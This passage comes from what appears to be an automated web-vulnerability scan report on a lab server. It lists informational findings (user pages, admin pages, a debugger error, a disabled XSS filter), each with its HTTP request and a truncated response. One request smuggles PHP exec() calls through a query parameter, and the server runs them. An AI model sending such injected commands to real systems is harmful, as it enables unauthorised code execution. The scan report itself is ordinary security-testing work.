User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 11:55:17 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 1345
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en">

<head>
<title>jyoti.ermine -- Kafeh khar-feim</title>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<lin
...[SNIP]...
3.9.16. http://10.250.200.5:81/user/marge.aphrodite
Previous  Next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://10.250.200.5:81
Path:   /user/marge.aphrodite

Request 1

GET /user/marge.aphrodite HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:81/
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 12:06:43 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 1364
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en">

<head>
<title>marge.aphrodite -- Kafeh khar-feim</title>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<
...[SNIP]...
3.9.17. http://10.250.200.5:81/user/marge.aphrodite/
Previous  Next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://10.250.200.5:81
Path:   /user/marge.aphrodite/

Request 1

GET /user/marge.aphrodite/ HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 11:56:17 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 1364
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en">

<head>
<title>marge.aphrodite -- Kafeh khar-feim</title>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<
...[SNIP]...
3.9.18. http://10.250.200.5:81/user/rica.orpah
Previous  Next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://10.250.200.5:81
Path:   /user/rica.orpah

Request 1

GET /user/rica.orpah HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:81/
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 12:14:38 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 1334
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en">

<head>
<title>rica.orpah -- Kafeh khar-feim</title>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<link
...[SNIP]...
3.9.19. http://10.250.200.5:81/user/rica.orpah/
Previous  Next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://10.250.200.5:81
Path:   /user/rica.orpah/

Request 1

GET /user/rica.orpah/ HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 12:17:20 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 1334
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en">

<head>
<title>rica.orpah -- Kafeh khar-feim</title>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<link
...[SNIP]...
3.9.20. http://10.250.200.5:81/user/ricca.gilud
Previous  Next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://10.250.200.5:81
Path:   /user/ricca.gilud

Request 1

GET /user/ricca.gilud HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:81/
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 12:22:14 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 1339
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en">

<head>
<title>ricca.gilud -- Kafeh khar-feim</title>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<link
...[SNIP]...
3.9.21. http://10.250.200.5:81/user/ricca.gilud/
Previous  Next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://10.250.200.5:81
Path:   /user/ricca.gilud/

Request 1

GET /user/ricca.gilud/ HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 12:17:36 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 1339
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en">

<head>
<title>ricca.gilud -- Kafeh khar-feim</title>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<link
...[SNIP]...
3.9.22. http://10.250.200.5:81/user/stephi.fonda
Previous  Next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://10.250.200.5:81
Path:   /user/stephi.fonda

Request 1

GET /user/stephi.fonda HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:81/
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 12:31:55 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 1399
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en">

<head>
<title>stephi.fonda -- Kafeh khar-feim</title>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<lin
...[SNIP]...
3.9.23. http://10.250.200.5:81/user/stephi.fonda/
Previous  Next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://10.250.200.5:81
Path:   /user/stephi.fonda/

Request 1

GET /user/stephi.fonda/ HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 12:24:36 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 1345
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en">

<head>
<title>stephi.fonda -- Kafeh khar-feim</title>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<lin
...[SNIP]...
3.9.24. http://10.250.200.5:8080/
Previous  Next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://10.250.200.5:8080
Path:   /

Request 1

GET / HTTP/1.1
Host: 10.250.200.5:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=1
Connection: close
Upgrade-Insecure-Requests: 1

Response 1

HTTP/1.0 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 2682
Server: Werkzeug/0.12.2 Python/3.6.3
Date: Wed, 08 Nov 2017 11:43:32 GMT

<!DOCTYPE html>
<html lang="en">

<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">
...[SNIP]...
3.9.25. http://10.250.200.5:8080/admin-networking.html
Previous  Next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://10.250.200.5:8080
Path:   /admin-networking.html

Request 1

GET /admin-networking.html HTTP/1.1
Host: 10.250.200.5:8080
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:8080/admin-system.html
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

Response 1

HTTP/1.0 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 6553
Server: Werkzeug/0.12.2 Python/3.6.3
Date: Wed, 08 Nov 2017 12:32:19 GMT

<!DOCTYPE html>
<html lang="en">

<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">
...[SNIP]...
3.9.26. http://10.250.200.5:8080/admin-system.html
Previous  Next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://10.250.200.5:8080
Path:   /admin-system.html

Request 1

GET /admin-system.html HTTP/1.1
Host: 10.250.200.5:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.250.200.5:8080/
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=1
Connection: close
Upgrade-Insecure-Requests: 1

Response 1

HTTP/1.0 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 5039
Server: Werkzeug/0.12.2 Python/3.6.3
Date: Wed, 08 Nov 2017 11:43:32 GMT

<!DOCTYPE html>
<html lang="en">

<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">
...[SNIP]...
3.9.27. http://10.250.200.5:8080/admin-users.html
Previous  Next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://10.250.200.5:8080
Path:   /admin-users.html

Request 1

GET /admin-users.html HTTP/1.1
Host: 10.250.200.5:8080
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:8080/admin-system.html
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

Response 1

HTTP/1.0 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 5624
Server: Werkzeug/0.12.2 Python/3.6.3
Date: Wed, 08 Nov 2017 12:32:30 GMT

<!DOCTYPE html>
<html lang="en">

<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">
...[SNIP]...
3.9.28. http://10.250.200.5:8080/login
Previous  Next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://10.250.200.5:8080
Path:   /login

Request 1

GET /login HTTP/1.1
Host: 10.250.200.5:8080
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:8080/
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

Response 1

HTTP/1.0 500 INTERNAL SERVER ERROR
Content-Type: text/html; charset=utf-8
X-XSS-Protection: 0
Connection: close
Server: Werkzeug/0.12.2 Python/3.6.3
Date: Wed, 08 Nov 2017 12:32:34 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>KeyError: 'userNone_username' // Werkzeug Debugger</title>
<link
...[SNIP]...
3.10. Browser cross-site scripting filter disabled
Previous  Next

There are 43 instances of this issue:

Issue description

Some browsers, including Internet Explorer, contain built-in filters designed to protect against cross-site scripting (XSS) attacks. Applications can instruct browsers to disable this filter by setting the following response header:

X-XSS-Protection: 0

This behavior does not in itself constitute a vulnerability; in some cases XSS filters may themselves be leveraged to perform attacks against application users. However, in typical situations XSS filters do provide basic protection for application users against some XSS vulnerabilities in applications. The presence of this header should be reviewed to establish whether it affects the application's security posture.

Issue remediation

Review whether the application needs to disable XSS filters. In most cases you can gain the protection provided by XSS filters without the associated risks by using the following response header:

X-XSS-Protection: 1; mode=block

When this header is set, browsers that detect an XSS attack will simply render a blank page instead of attempting to sanitize the injected script. This behavior is considerably less likely to introduce new security issues.

References



3.10.1. http://10.250.200.5:81/
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://10.250.200.5:81
Path:   /

Request 1

GET / HTTP/1.1
Host: 10.250.200.5:81
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=1
Connection: close
Upgrade-Insecure-Requests: 1

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 11:42:43 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 8273
Connection: close
Content-Type: text/html; charset=UTF-8

<!doctype html>
<html pmbx_context="68E2E7E7-626F-494D-87D5-63024AC0F832">

<head>
<title>Kafeh khar-feim</title>
<style type="text/css">
div.absolute {
position: absolute;
...[SNIP]...
3.10.2. http://10.250.200.5:81/133_test.php
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://10.250.200.5:81
Path:   /133_test.php

Request 1

GET /133_test.php?test=echo+%22Generated+by+%22+.+exec%28%22hostname%22%29+.+%22%3C%2Fbr%3E+at+%22+.+exec%28%22date%22%29%3B HTTP/1.1
Host: 10.250.200.5:81
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.250.200.5:81/
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=1
Connection: close
Upgrade-Insecure-Requests: 1

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 11:42:44 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 62
Connection: close
Content-Type: text/html; charset=UTF-8

Generated by f88c475663fb</br> at Wed Nov 8 11:42:44 UTC 2017
3.10.3. http://10.250.200.5:81/config.php
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://10.250.200.5:81
Path:   /config.php

Request 1

GET /config.php HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:81/robots.txt
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0; wordpress_test_cookie=WP+Cookie+check

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 11:47:36 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

3.10.4. http://10.250.200.5:81/config.php/
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://10.250.200.5:81
Path:   /config.php/

Request 1

GET /config.php/ HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:81/robots.txt
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0; wordpress_test_cookie=WP+Cookie+check

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 11:47:43 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

3.10.5. http://10.250.200.5:81/contactus.php
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://10.250.200.5:81
Path:   /contactus.php

Request 1

GET /contactus.php HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 11:47:44 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 1761
Connection: close
Content-Type: text/html; charset=UTF-8

<br />
<b>Notice</b>: Undefined index: f in <b>/var/www/html/contactus.php</b> on line <b>7</b><br />
<br />
<b>Warning</b>: file_get_contents(): Filename cannot be empty in <b>/var/www/html/contact
...[SNIP]...
3.10.6. http://10.250.200.5:81/css/style.css
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://10.250.200.5:81
Path:   /css/style.css

Request 1

GET /css/style.css HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:81/user/stephi.fonda/
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0; wordpress_test_cookie=WP+Cookie+check

Response 1

HTTP/1.1 200 Ok
Date: Wed, 08 Nov 2017 11:47:54 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 0
Connection: close
Content-Type: inode/x-empty

3.10.7. http://10.250.200.5:81/login
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://10.250.200.5:81
Path:   /login

Request 1

GET /login HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:81/
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 11:47:59 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 882
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en">

<head>
<title></title>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<link href="/css/style.css" rel="st
...[SNIP]...
3.10.8. http://10.250.200.5:81/phpinfo.php
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://10.250.200.5:81
Path:   /phpinfo.php

Request 1

GET /phpinfo.php HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:81/robots.txt
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0; wordpress_test_cookie=WP+Cookie+check

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 11:48:06 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 89859

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<style type="text/css">
body {background-color: #fff; co
...[SNIP]...
3.10.9. http://10.250.200.5:81/phpinfo.php/
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://10.250.200.5:81
Path:   /phpinfo.php/

Request 1

GET /phpinfo.php/ HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:81/robots.txt
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0; wordpress_test_cookie=WP+Cookie+check

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 11:48:15 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 89874

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<style type="text/css">
body {background-color: #fff; co
...[SNIP]...
3.10.10. http://10.250.200.5:81/register
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://10.250.200.5:81
Path:   /register

Request 1

GET /register HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:81/
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 11:48:16 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 2292
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en">

<head>
   <title></title>
   <meta charset="UTF-8">
   <meta name="viewport" content="width=device-width, initial-scale=1">
   <link href="/css/style.css" rel="stylesheet">
<
...[SNIP]...
3.10.11. http://10.250.200.5:81/robots.txt
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://10.250.200.5:81
Path:   /robots.txt

Request 1

GET /robots.txt HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
